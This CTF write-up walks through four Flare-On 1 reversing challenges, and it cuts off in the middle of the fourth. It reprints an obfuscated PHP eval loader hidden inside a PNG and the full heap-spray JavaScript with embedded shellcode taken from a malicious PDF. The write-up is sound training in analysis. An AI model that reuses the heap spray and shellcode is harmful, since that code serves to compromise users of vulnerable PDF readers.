# Flare-on 1

## Link to Lab: <https://cyberdefenders.org/blueteam-ctf-challenges/24#nav-questions>

## Q1. Challenge 1 – Challenge1.exe key?

The file was built against .NET 2.0 (based on the mscorlib import). That matters later for choosing the tool to analyze it with; I use `DotPeek` for this.

<figure><img src="/files/7IwvesKke3kgioAPVhaV" alt=""><figcaption></figcaption></figure>

Run the file to see what it does:

<figure><img src="/files/VgNKrFA0sV1jQXy5hST1" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/4Cjk4LwY8YcGQ6tLgnGj" alt=""><figcaption></figcaption></figure>

It also requires .NET 2.0 or 3.0 to be installed if your machine doesn't have it.

Continue in DotPeek to understand what the challenge file does.

After looking around, start from the `main()` function and follow it to this:

<figure><img src="/files/6NkENrrlSJ2LykGStvLH" alt=""><figcaption></figcaption></figure>

Note the decode button drawn on screen with `button.Text = "DECODE";` and the handler attached to it with `button.Click += new EventHandler(this.btnDecode_Click);`. The method to look at is therefore `btnDecode_Click`, which shows:

<figure><img src="/files/W27ropGDNtiFTSHSZqRn" alt=""><figcaption></figcaption></figure>

The data comes from `byte[] datSecret = Resources.dat_secret;`, so we need to find that resource and apply the same XOR math to it to recover the decoded message.

`dat_secret` is a resource embedded in this file, so save it out to a separate file:

<figure><img src="/files/pCc2SuNyuZFA09DA2QFY" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/3UzEVCiiVadeEbEp72UO" alt=""><figcaption></figcaption></figure>

Now work through the math step by step. The code goes Decode -> Encode -> print to the screen, so we only need the first (decode) step to recover the data we want:

<figure><img src="/files/dlkub8KudVnCNYgBey33" alt=""><figcaption></figcaption></figure>

Solution 2: the fastest way (using Process Hacker)

Run the challenge file, click the DECODE button, then open Process Hacker:

<figure><img src="/files/GhDI2MypfoPQLTpDFmy1" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/SBkNpmmn5JmC1xFCapQn" alt=""><figcaption><p>Open Properties </p></figcaption></figure>

Then open Strings -> Search -> click OK:

<figure><img src="/files/c5A6ghEhzcWwzGsf48wC" alt=""><figcaption></figcaption></figure>

Now filter the strings: search for entries containing the keyword `flare`:

<figure><img src="/files/VA1yfoB4fE6YZJrpiVjK" alt=""><figcaption></figcaption></figure>

And I got the flag:

<figure><img src="/files/7bRQCP9cmLFQmLC3TPVf" alt=""><figcaption></figcaption></figure>

## Q2. Challenge 2 – flare-on.png key?

This challenge contains two files: a PNG and an HTML file.

So let's take a look at the HTML first:

<figure><img src="/files/qIFy5uBg3vmONl17beKh" alt=""><figcaption><p>It's just a description page; it contains nothing useful</p></figcaption></figure>

Now move on to the .png file:

<figure><img src="/files/2jUvJEh60BCzDwYE0CdD" alt=""><figcaption></figcaption></figure>

When I open it with HxD, I see some PHP inside. Let's pull it out to see it more clearly:

```php
<?php $terms = [
    "M","Z","]","p","\\","w","f","1","v","<","a","Q","z"," ","s","m","+","E","D","g","W","\"",
    "q","y","T","V","n","S","X",")","9","C","P","r","&","\'","!","x","G",":","2","~","O","h",
    "u","U","@",";","H","3","F","6","b","L",">","^",",",".","l","$","d","`","%","N","*","[",
    "0","}","J","-","5","_","A","=","{","k","o","7","#","i","I","Y","(","j","/","?","K","c","B","t","R","4","8","e","|",];

$order = [
    59,71,73,13,35,10,20,81,76,10,28,63,12,1,28,11,76,68,50,30,11,24,7,63,45,20,23,68,87,42,24,60,87,63,18,58,87,63,18,58,87,63,83,43,87,93,18,90,38,28,18,19,66,28,18,17,37,63,58,37,91,63,83,43,87,42,24,
    60,87,93,18,87,66,28,48,19,66,63,50,37,91,63,17,1,87,93,18,45,66,28,48,19,40,11,25,5,70,63,7,37,91,63,12,1,87,93,18,81,37,28,48,19,12,63,25,37,91,63,83,63,87,93,18,87,23,28,18,75,49,28,48,19,49,0,50,37,91,63,18,
    50,87,42,18,90,87,93,18,81,40,28,48,19,40,11,7,5,70,63,7,37,91,63,12,68,87,93,18,81,7,28,48,19,66,63,50,5,40,63,25,37,91,63,24,63,87,63,12,68,87,0,24,17,37,28,18,17,37,0,50,5,40,42,50,5,49,42,25,5,91,63,50,5,70,
    42,25,37,91,63,75,1,87,93,18,1,17,80,58,66,3,86,27,88,77,80,38,25,40,81,20,5,76,81,15,50,12,1,24,81,66,28,40,90,58,81,40,30,75,1,27,19,75,28,7,88,32,45,7,90,52,80,58,5,70,63,7,5,66,42,25,37,91,0,12,50,87,63,83,43,
    87,93,18,90,38,28,48,19,7,63,50,5,37,0,24,1,87,0,24,72,66,28,48,19,40,0,25,5,37,0,24,1,87,93,18,11,66,28,18,87,70,28,48,19,7,63,50,5,37,0,18,1,87,42,24,60,87,0,24,17,91,28,18,75,49,28,18,45,12,28,48,19,40,0,7,5,37,
    0,24,90,87,93,18,81,37,28,48,19,49,0,50,5,40,63,25,5,91,63,50,5,37,0,18,68,87,93,18,1,18,28,48,19,40,0,25,5,37,0,24,90,87,0,24,72,37,28,48,19,66,63,50,5,40,63,25,37,91,63,24,63,87,63,12,68,87,0,24,17,37,28,48,19,40,
    90,25,37,91,63,18,90,87,93,18,90,38,28,18,19,66,28,18,75,70,28,48,19,40,90,58,37,91,63,75,11,79,28,27,75,3,42,23,88,30,35,47,59,71,71,73,35,68,38,63,8,1,38,45,30,81,15,50,12,1,24,81,66,28,40,90,58,81,40,30,75,1,27,19,
    75,28,23,75,77,1,28,1,43,52,31,19,75,81,40,30,75,1,27,75,77,35,47,59,71,71,71,73,21,4,37,51,40,4,7,91,7,4,37,77,49,4,7,91,70,4,37,49,51,4,51,91,4,37,70,6,4,7,91,91,4,37,51,70,4,7,91,49,4,37,51,6,4,7,91,91,4,37,51,70,21,
    47,93,8,10,58,82,59,71,71,71,82,59,71,71,29,29,47,];
$do_me = "";
// rebuild the hidden script one term at a time, indexing $terms by $order
for ($i = 0; $i < count($order); $i++) {
    $do_me = $do_me . $terms[$order[$i]];
}
eval($do_me); ?>
```

<figure><img src="/files/iYAqj1y4p8SyqXOcp0AV" alt=""><figcaption></figcaption></figure>

Change the code so it prints the rebuilt string instead of executing it (eval -> print):

<figure><img src="/files/JK8taKPi6yGRlACAP80h" alt=""><figcaption><p>We get another piece of code from this</p></figcaption></figure>

Edit that in the same way, and this is what the new code produces when run:

<figure><img src="/files/sSRggy8xyoKNt1rWrPrW" alt=""><figcaption><p>Let's follow the result</p></figcaption></figure>

We get this:

<figure><img src="/files/riQ9XMseT9QNbfVK3pQy" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/mhRWJMI3phkY7tE5kXwm" alt=""><figcaption></figcaption></figure>

Let's decode this message. I use Python for this step and get a readable text message:

<figure><img src="/files/XtzachV0vl9ym1Ip87SA" alt=""><figcaption></figcaption></figure>

Then replace the DOT, DASH, ... words in the message to make it readable:

<figure><img src="/files/CWE1r7YFwZcrp90Sp99s" alt=""><figcaption><p>Finally I got the correct one</p></figcaption></figure>
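The two steps above, rebuilding the hidden script from the `$terms`/`$order` tables and then turning the DOT/DASH words into letters, as an added Python example. This is not code from the write-up: the term table, index list and DOT/DASH text are constructed for the demo, and the layout it assumes for the DOT/DASH message (tokens of one letter run together, letters separated by spaces, words by `/`) is an assumption, not the challenge's format.

```python
# Added example, not code from the write-up: rebuild the string that an
# obfuscated PHP script assembles from a term table plus an index list (the
# $terms/$order pattern above), and decode a spelled-out DOT/DASH message.
# The term table, index list and DOT/DASH text here are constructed for the
# demo; they are not the challenge's data.

MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z", "-----": "0", ".----": "1", "..---": "2",
    "...--": "3", "....-": "4", ".....": "5", "-....": "6", "--...": "7",
    "---..": "8", "----.": "9",
}


def rebuild(terms, order):
    """Do what the PHP loop does, concatenate terms[order[i]] in sequence,
    but fail loudly on an index outside the table (PHP would only warn and
    append an empty string, silently corrupting the result)."""
    bad = sorted({i for i in order if not 0 <= i < len(terms)})
    if bad:
        raise IndexError("indices outside the term table: %r" % bad)
    return "".join(terms[i] for i in order)


def make_order(text, terms):
    """The obfuscator's side of the scheme: express text as indices into the
    term table. Used here only to construct the sample input."""
    return [terms.index(ch) for ch in text]


def decode_dot_dash(text, letter_sep=" ", word_sep="/"):
    """Map DOT/DASH words to Morse symbols and look each letter up.
    Assumed layout: the DOT/DASH tokens of one letter are run together,
    letters are separated by letter_sep and words by word_sep."""
    words = []
    for word in text.split(word_sep):
        letters = []
        for group in word.split(letter_sep):
            if not group:
                continue
            symbols = group.replace("DASH", "-").replace("DOT", ".")
            letters.append(MORSE.get(symbols, "?"))
        words.append("".join(letters))
    return " ".join(words)


# Constructed sample: a tiny "script" hidden behind the same term/index trick.
SAMPLE_SCRIPT = "echo 'DOTDOTDOT DASHDASHDASH DOTDOTDOT';"
SAMPLE_TERMS = sorted(set(SAMPLE_SCRIPT), reverse=True)
SAMPLE_ORDER = make_order(SAMPLE_SCRIPT, SAMPLE_TERMS)

if __name__ == "__main__":
    recovered = rebuild(SAMPLE_TERMS, SAMPLE_ORDER)
    print(recovered)  # the script text, printed rather than eval'd
    print(decode_dot_dash("DOTDOTDOT DASHDASHDASH DOTDOTDOT"))  # SOS
```

Printing the rebuilt string instead of evaluating it is the whole point of the eval -> print swap: each layer is inspected before anything in it runs, and the index check in `rebuild` catches a table/index mismatch that PHP would paper over with an empty string.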

## Q3. Challenge 3 – such\_evil.exe key?

First, check the file type:

<figure><img src="/files/UPpDYQG51fYF8BOAd9PZ" alt=""><figcaption><p>It looks like a Windows executable, so rename it to .exe and analyze it as one</p></figcaption></figure>

Open the file in IDA to see what it contains:

<figure><img src="/files/qJEJcsvJTN3L8WHfVnKu" alt=""><figcaption></figcaption></figure>

The call to `sub_401000` looks interesting: 0x401000 is the start of the code section, and the first function there is commonly code written by the author rather than runtime code.

So let's move to it:

<figure><img src="/files/QoQm3mEj3SZZGMf7sJ2l" alt=""><figcaption><p>The code looks very long</p></figcaption></figure>

Skip past all of this and look at the end:

<figure><img src="/files/f2eHl6n6KIQjbqnbVooJ" alt=""><figcaption></figcaption></figure>

This shows the binary calling the address of the first byte it moved onto the stack, i.e. shellcode. We need to catch it at this point, so set a breakpoint on `call eax`, just before control is transferred to the shellcode (the program has to be run to hit it).

I will debug this with `x32dbg`:

<figure><img src="/files/EsVpsYWGXo6P8qQZu5NE" alt=""><figcaption><p>Set a breakpoint at 0040249B and step into eax</p></figcaption></figure>

<figure><img src="/files/U2O00lffzRoDz8iCdYJK" alt=""><figcaption></figcaption></figure>

Set a breakpoint and step through this loop:

<figure><img src="/files/xAWmG77l4Kd24avzc516" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/wXfadyTjlT2QSGIwoI7y" alt=""><figcaption></figcaption></figure>

Here we also see the first string used as the XOR decryption key: `nopasaurus`

<figure><img src="/files/PJS3wtszBs1GlYOIAen1" alt=""><figcaption></figcaption></figure>

Continue stepping through the loop by setting a breakpoint past it:

<figure><img src="/files/PHg1FKVMAnNo95wkgGKQ" alt=""><figcaption></figcaption></figure>

The XOR loops here all look the same, so we can skip over the math and run to the `call` instruction to retrieve the flag:

<figure><img src="/files/XdkYol5u7DV46ZLLpFFc" alt=""><figcaption></figcaption></figure>

We get this message:

<figure><img src="/files/raLlJat3tPEdmbMCrGnr" alt=""><figcaption><p>Almost there</p></figcaption></figure>

<figure><img src="/files/jzV2ynJ1YB27yjpwO6sn" alt=""><figcaption><p>Skip the last loop</p></figcaption></figure>

Follow `EBX` in the hex dump:

<figure><img src="/files/ZQRFKCMPfvWGIiMWrlSY" alt=""><figcaption></figcaption></figure>
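The decryption loop seen in the debugger is a repeating-key XOR, which is easy to redo offline on a buffer dumped from x32dbg. The following is an added Python example, not code from the write-up: the key `nopasaurus` is the one found above, but the ciphertext is constructed here from a sample string, and the `recover_key` helper (deriving the key from a known plaintext prefix) is a general analyst check rather than anything the challenge does.

```python
# Added example, not code from the write-up: the repeating-key XOR that the
# such_evil.exe loop performs, reimplemented in Python so a buffer dumped
# from x32dbg can be decoded offline, plus the reverse check an analyst uses
# when the key is not obvious. The key "nopasaurus" is the one the write-up
# found; the ciphertext below is constructed here from a sample string and
# is not the challenge's data.

KEY = b"nopasaurus"


def xor_repeat(data: bytes, key: bytes) -> bytes:
    """XOR each byte with key[i mod len(key)]. XOR is its own inverse, so the
    same call both encrypts and decrypts."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(cipher: bytes, known_plain: bytes, key_len: int) -> bytes:
    """Known-plaintext check: if the first key_len bytes of the output are
    known (a banner, a 'flare' prefix, a PE header), cipher ^ plain yields
    the key, which can then be compared with what the debugger shows."""
    if len(known_plain) < key_len or len(cipher) < key_len:
        raise ValueError("need at least key_len bytes of cipher and plaintext")
    return bytes(cipher[i] ^ known_plain[i] for i in range(key_len))


def printable_ratio(data: bytes) -> float:
    """Fraction of printable ASCII bytes; a cheap way to tell whether a
    candidate key turned the buffer into text or into noise."""
    if not data:
        return 0.0
    return sum(32 <= b < 127 for b in data) / len(data)


# Constructed sample: encrypt a message the way the loop would, then decode.
SAMPLE_PLAIN = b"constructed sample text, not the challenge flag"
SAMPLE_CIPHER = xor_repeat(SAMPLE_PLAIN, KEY)


def decrypt_sample(cipher: bytes = SAMPLE_CIPHER) -> bytes:
    return xor_repeat(cipher, KEY)


if __name__ == "__main__":
    print(decrypt_sample())
    print(recover_key(SAMPLE_CIPHER, SAMPLE_PLAIN[:len(KEY)], len(KEY)))
    print("printable: %.2f" % printable_ratio(decrypt_sample()))
```

When a binary runs several XOR passes with different keys, as the chain of similar loops here suggests, apply `xor_repeat` once per pass in the reverse order, checking `printable_ratio` after each one to confirm the buffer is heading towards text.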

The second way (using Process Hacker)

Do the same as in Challenge 1: run the file, then open Process Hacker and search the strings:

<figure><img src="/files/UXHajaNoyYjbMCUyYYnE" alt=""><figcaption><p>Got the flag the easy way</p></figcaption></figure>

## Q4. Challenge 4 – APT9001.pdf key?

I have dealt with malicious PDF analysis before (see my previous article), so let's move to REMnux, which has the best tools for it.

`peepdf` dumps information about the objects in the PDF, also available in JSON format:

<figure><img src="/files/BxqiHyJ9fffg6baSr6iO" alt=""><figcaption></figcaption></figure>

Next, use the `extract js` command to pull out the JavaScript contained in the file:

<figure><img src="/files/DlYAwWAXPnWk2jpgVzh7" alt=""><figcaption></figcaption></figure>

```javascript
// peepdf comment: Javascript code located in object 6 (version 0)

var HdPN = "";
var zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf = "";
var IxTUQnOvHg = unescape("%u72f9%u4649%u1525%u7f0d%u3d3c%ue084%ud62a%ue139%ua84a%u76b9%u9824%u7378%u7d71%u757f%u2076%u96d4%uba91%u1970%ub8f9%ue232%u467b%u9ba8%ufe01%uc7c6%ue3c1%u7e24%u437c%ue180%ub115%ub3b2%u4f66%u27b6%u9f3c%u7a4e%u412d%ubbbf%u7705%uf528%u9293%u9990%ua998%u0a47%u14eb%u3d49%u484b%u372f%ub98d%u3478%u0bb4%ud5d2%ue031%u3572%ud610%u6740%u2bbe%u4afd%u041c%u3f97%ufc3a%u7479%u421d%ub7b5%u0c2c%u130d%u25f8%u76b0%u4e79%u7bb1%u0c66%u2dbb%u911c%ua92f%ub82c%u8db0%u0d7e%u3b96%u49d4%ud56b%u03b7%ue1f7%u467d%u77b9%u3d42%u111d%u67e0%u4b92%ueb85%u2471%u9b48%uf902%u4f15%u04ba%ue300%u8727%u9fd6%u4770%u187a%u73e2%ufd1b%u2574%u437c%u4190%u97b6%u1499%u783c%u8337%ub3f8%u7235%u693f%u98f5%u7fbe%u4a75%ub493%ub5a8%u21bf%ufcd0%u3440%u057b%ub2b2%u7c71%u814e%u22e1%u04eb%u884a%u2ce2%u492d%u8d42%u75b3%uf523%u727f%ufc0b%u0197%ud3f7%u90f9%u41be%ua81c%u7d25%ub135%u7978%uf80a%ufd32%u769b%u921d%ubbb4%u77b8%u707e%u4073%u0c7a%ud689%u2491%u1446%u9fba%uc087%u0dd4%u4bb0%ub62f%ue381%u0574%u3fb9%u1b67%u93d5%u8396%u66e0%u47b5%u98b7%u153c%ua934%u3748%u3d27%u4f75%u8cbf%u43e2%ub899%u3873%u7deb%u257a%uf985%ubb8d%u7f91%u9667%ub292%u4879%u4a3c%ud433%u97a9%u377e%ub347%u933d%u0524%u9f3f%ue139%u3571%u23b4%ua8d6%u8814%uf8d1%u4272%u76ba%ufd08%ube41%ub54b%u150d%u4377%u1174%u78e3%ue020%u041c%u40bf%ud510%ub727%u70b1%uf52b%u222f%u4efc%u989b%u901d%ub62c%u4f7c%u342d%u0c66%ub099%u7b49%u787a%u7f7e%u7d73%ub946%ub091%u928d%u90bf%u21b7%ue0f6%u134b%u29f5%u67eb%u2577%ue186%u2a05%u66d6%ua8b9%u1535%u4296%u3498%ub199%ub4ba%ub52c%uf812%u4f93%u7b76%u3079%ubefd%u3f71%u4e40%u7cb3%u2775%ue209%u4324%u0c70%u182d%u02e3%u4af9%ubb47%u41b6%u729f%u9748%ud480%ud528%u749b%u1c3c%ufc84%u497d%u7eb8%ud26b%u1de0%u0d76%u3174%u14eb%u3770%u71a9%u723d%ub246%u2f78%u047f%ub6a9%u1c7b%u3a73%u3ce1%u19be%u34f9%ud500%u037a%ue2f8%ub024%ufd4e%u3d79%u7596%u9b15%u7c49%ub42f%u9f4f%u4799%uc13b%ue3d0%u4014%u903f%u41bf%u4397%ub88d%ub548%u0d77%u4ab2%u2d93%u9267%ub198%ufc1a%ud4b9%ub32c%ubaf5%u690c%u91d6%u04a8%u1dbb%u4666%u2505%u35b7%u3742%u4b27%ufc90%ud233%u30b2%uff64%u5a32%u528b%u8b0c%u1452%u728b%u3328%ub1c9%u3318%u33ff%uacc0%u613c%u027c%u202c%ucfc1%u030d%ue2f8%u81f0%u5bff%u4abc%u8b6a%u105a%u128b%uda75%u538b%u033c%uffd3%u3472%u528b%u0378%u8bd3%u2072%uf303%uc933%uad41%uc303%u3881%u6547%u5074%uf475%u7881%u7204%u636f%u7541%u81eb%u0878%u6464%u6572%ue275%u8b49%u2472%uf303%u8b66%u4e0c%u728b%u031c%u8bf3%u8e14%ud303%u3352%u57ff%u6168%u7972%u6841%u694c%u7262%u4c68%u616f%u5464%uff53%u68d2%u3233%u0101%u8966%u247c%u6802%u7375%u7265%uff54%u68d0%u786f%u0141%udf8b%u5c88%u0324%u6168%u6567%u6842%u654d%u7373%u5054%u54ff%u2c24%u6857%u2144%u2121%u4f68%u4e57%u8b45%ue8dc%u0000%u0000%u148b%u8124%u0b72%ua316%u32fb%u7968%ubece%u8132%u1772%u45ae%u48cf%uc168%ue12b%u812b%u2372%u3610%ud29f%u7168%ufa44%u81ff%u2f72%ua9f7%u0ca9%u8468%ucfe9%u8160%u3b72%u93be%u43a9%ud268%u98a3%u8137%u4772%u8a82%u3b62%uef68%u11a4%u814b%u5372%u47d6%uccc0%ube68%ua469%u81ff%u5f72%ucaa3%u3154%ud468%u65ab%u8b52%u57cc%u5153%u8b57%u89f1%u83f7%u1ec7%ufe39%u0b7d%u3681%u4542%u4645%uc683%ueb04%ufff1%u68d0%u7365%u0173%udf8b%u5c88%u0324%u5068%u6f72%u6863%u7845%u7469%uff54%u2474%uff40%u2454%u5740%ud0ff");
var MPBPtdcBjTlpvyTYkSwgkrWhXL = "";

for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA = 128; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA >= 0; --EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA) MPBPtdcBjTlpvyTYkSwgkrWhXL += unescape("%ub32f%u3791");
ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv = MPBPtdcBjTlpvyTYkSwgkrWhXL + IxTUQnOvHg;
OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY = unescape("%ub32f%u3791");
fJWhwERSDZtaZXlhcREfhZjCCVqFAPS = 20;
fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA = fJWhwERSDZtaZXlhcREfhZjCCVqFAPS + ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv.length
while (OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.length < fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA) OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY += OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY;
UohsTktonqUXUXspNrfyqyqDQlcDfbmbywFjyLJiesb = OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.substring(0, fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA);
MOysyGgYplwyZzNdETHwkru = OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.substring(0, OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.length - fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA);
while (MOysyGgYplwyZzNdETHwkru.length + fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA < 0x40000) MOysyGgYplwyZzNdETHwkru = MOysyGgYplwyZzNdETHwkru + MOysyGgYplwyZzNdETHwkru + UohsTktonqUXUXspNrfyqyqDQlcDfbmbywFjyLJiesb;
DPwxazRhwbQGu = new Array();
for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA = 0; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA < 100; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA++) DPwxazRhwbQGu[EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA] = MOysyGgYplwyZzNdETHwkru + ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv;

for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA = 142; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA >= 0; --EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA) zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf += unescape("%ub550%u0166");
bGtvKT = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length + 20
while (zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length < bGtvKT) zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf += zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf;
Juphd = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.substring(0, bGtvKT);
QCZabMzxQiD = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.substring(0, zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length - bGtvKT);
while (QCZabMzxQiD.length + bGtvKT < 0x40000) QCZabMzxQiD = QCZabMzxQiD + QCZabMzxQiD + Juphd;
FovEDIUWBLVcXkOWFAFtYRnPySjMblpAiQIpweE = new Array();
for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA = 0; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA < 125; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA++) FovEDIUWBLVcXkOWFAFtYRnPySjMblpAiQIpweE[EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA] = QCZabMzxQiD + zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf;
```

Of all the code above, only the `unescape("%u72f9%u.....` string matters, because it looks like shellcode. Let's convert it into something we can execute.

Deobfuscating the code (renaming the variables) makes it easier to read:

```javascript
// peepdf comment: Javascript code located in object 6 (version 0)

var string_1 = "";
var string_2 = "";
var string_3 = unescape("%u72f9%u4649%u1525%u7f0d%u3d3c%ue084%ud62a%ue139%ua84a%u76b9%u9824%u7378%u7d71%u757f%u2076%u96d4%uba91%u1970%ub8f9%ue232%u467b%u9ba8%ufe01%uc7c6%ue3c1%u7e24%u437c%ue180%ub115%ub3b2%u4f66%u27b6%u9f3c%u7a4e%u412d%ubbbf%u7705%uf528%u9293%u9990%ua998%u0a47%u14eb%u3d49%u484b%u372f%ub98d%u3478%u0bb4%ud5d2%ue031%u3572%ud610%u6740%u2bbe%u4afd%u041c%u3f97%ufc3a%u7479%u421d%ub7b5%u0c2c%u130d%u25f8%u76b0%u4e79%u7bb1%u0c66%u2dbb%u911c%ua92f%ub82c%u8db0%u0d7e%u3b96%u49d4%ud56b%u03b7%ue1f7%u467d%u77b9%u3d42%u111d%u67e0%u4b92%ueb85%u2471%u9b48%uf902%u4f15%u04ba%ue300%u8727%u9fd6%u4770%u187a%u73e2%ufd1b%u2574%u437c%u4190%u97b6%u1499%u783c%u8337%ub3f8%u7235%u693f%u98f5%u7fbe%u4a75%ub493%ub5a8%u21bf%ufcd0%u3440%u057b%ub2b2%u7c71%u814e%u22e1%u04eb%u884a%u2ce2%u492d%u8d42%u75b3%uf523%u727f%ufc0b%u0197%ud3f7%u90f9%u41be%ua81c%u7d25%ub135%u7978%uf80a%ufd32%u769b%u921d%ubbb4%u77b8%u707e%u4073%u0c7a%ud689%u2491%u1446%u9fba%uc087%u0dd4%u4bb0%ub62f%ue381%u0574%u3fb9%u1b67%u93d5%u8396%u66e0%u47b5%u98b7%u153c%ua934%u3748%u3d27%u4f75%u8cbf%u43e2%ub899%u3873%u7deb%u257a%uf985%ubb8d%u7f91%u9667%ub292%u4879%u4a3c%ud433%u97a9%u377e%ub347%u933d%u0524%u9f3f%ue139%u3571%u23b4%ua8d6%u8814%uf8d1%u4272%u76ba%ufd08%ube41%ub54b%u150d%u4377%u1174%u78e3%ue020%u041c%u40bf%ud510%ub727%u70b1%uf52b%u222f%u4efc%u989b%u901d%ub62c%u4f7c%u342d%u0c66%ub099%u7b49%u787a%u7f7e%u7d73%ub946%ub091%u928d%u90bf%u21b7%ue0f6%u134b%u29f5%u67eb%u2577%ue186%u2a05%u66d6%ua8b9%u1535%u4296%u3498%ub199%ub4ba%ub52c%uf812%u4f93%u7b76%u3079%ubefd%u3f71%u4e40%u7cb3%u2775%ue209%u4324%u0c70%u182d%u02e3%u4af9%ubb47%u41b6%u729f%u9748%ud480%ud528%u749b%u1c3c%ufc84%u497d%u7eb8%ud26b%u1de0%u0d76%u3174%u14eb%u3770%u71a9%u723d%ub246%u2f78%u047f%ub6a9%u1c7b%u3a73%u3ce1%u19be%u34f9%ud500%u037a%ue2f8%ub024%ufd4e%u3d79%u7596%u9b15%u7c49%ub42f%u9f4f%u4799%uc13b%ue3d0%u4014%u903f%u41bf%u4397%ub88d%ub548%u0d77%u4ab2%u2d93%u9267%ub198%ufc1a%ud4b9%ub32c%ubaf5%u690c%u91d6%u04a8%u1dbb%u4666%u2505%u35b7%u3742%u4b27%ufc90%ud233%u30b2%uff64%u5a32%u528b%u8b0c%u1452%u728b%u3328%ub1c9%u3318%u33ff%uacc0%u613c%u027c%u202c%ucfc1%u030d%ue2f8%u81f0%u5bff%u4abc%u8b6a%u105a%u128b%uda75%u538b%u033c%uffd3%u3472%u528b%u0378%u8bd3%u2072%uf303%uc933%uad41%uc303%u3881%u6547%u5074%uf475%u7881%u7204%u636f%u7541%u81eb%u0878%u6464%u6572%ue275%u8b49%u2472%uf303%u8b66%u4e0c%u728b%u031c%u8bf3%u8e14%ud303%u3352%u57ff%u6168%u7972%u6841%u694c%u7262%u4c68%u616f%u5464%uff53%u68d2%u3233%u0101%u8966%u247c%u6802%u7375%u7265%uff54%u68d0%u786f%u0141%udf8b%u5c88%u0324%u6168%u6567%u6842%u654d%u7373%u5054%u54ff%u2c24%u6857%u2144%u2121%u4f68%u4e57%u8b45%ue8dc%u0000%u0000%u148b%u8124%u0b72%ua316%u32fb%u7968%ubece%u8132%u1772%u45ae%u48cf%uc168%ue12b%u812b%u2372%u3610%ud29f%u7168%ufa44%u81ff%u2f72%ua9f7%u0ca9%u8468%ucfe9%u8160%u3b72%u93be%u43a9%ud268%u98a3%u8137%u4772%u8a82%u3b62%uef68%u11a4%u814b%u5372%u47d6%uccc0%ube68%ua469%u81ff%u5f72%ucaa3%u3154%ud468%u65ab%u8b52%u57cc%u5153%u8b57%u89f1%u83f7%u1ec7%ufe39%u0b7d%u3681%u4542%u4645%uc683%ueb04%ufff1%u68d0%u7365%u0173%udf8b%u5c88%u0324%u5068%u6f72%u6863%u7845%u7469%uff54%u2474%uff40%u2454%u5740%ud0ff");
var string_4 = "";

for (var_1 = 128; var_1 >= 0; --var_1) string_4 += unescape("%ub32f%u3791");
var_2 = string_4 + string_3; // sled followed by the shellcode (string_3 is the renamed IxTUQnOvHg)
var_3 = unescape("%ub32f%u3791");
var_4 = 20;
string_5 = var_4 + var_2.length
while (var_3.length < string_5) var_3 += var_3;
string_6 = var_3.substring(0, string_5);
string_7 = var_3.substring(0, var_3.length - string_5);
while (string_7.length + string_5 < 0x40000) string_7 = string_7 + string_7 + string_6;
string_8 = new Array();
for (var_1 = 0; var_1 < 100; var_1++) string_8[var_1] = string_7 + var_2;

for (var_1 = 142; var_1 >= 0; --var_1) string_2 += unescape("%ub550%u0166");
string_9 = string_2.length + 20
while (string_2.length < string_9) string_2 += string_2;
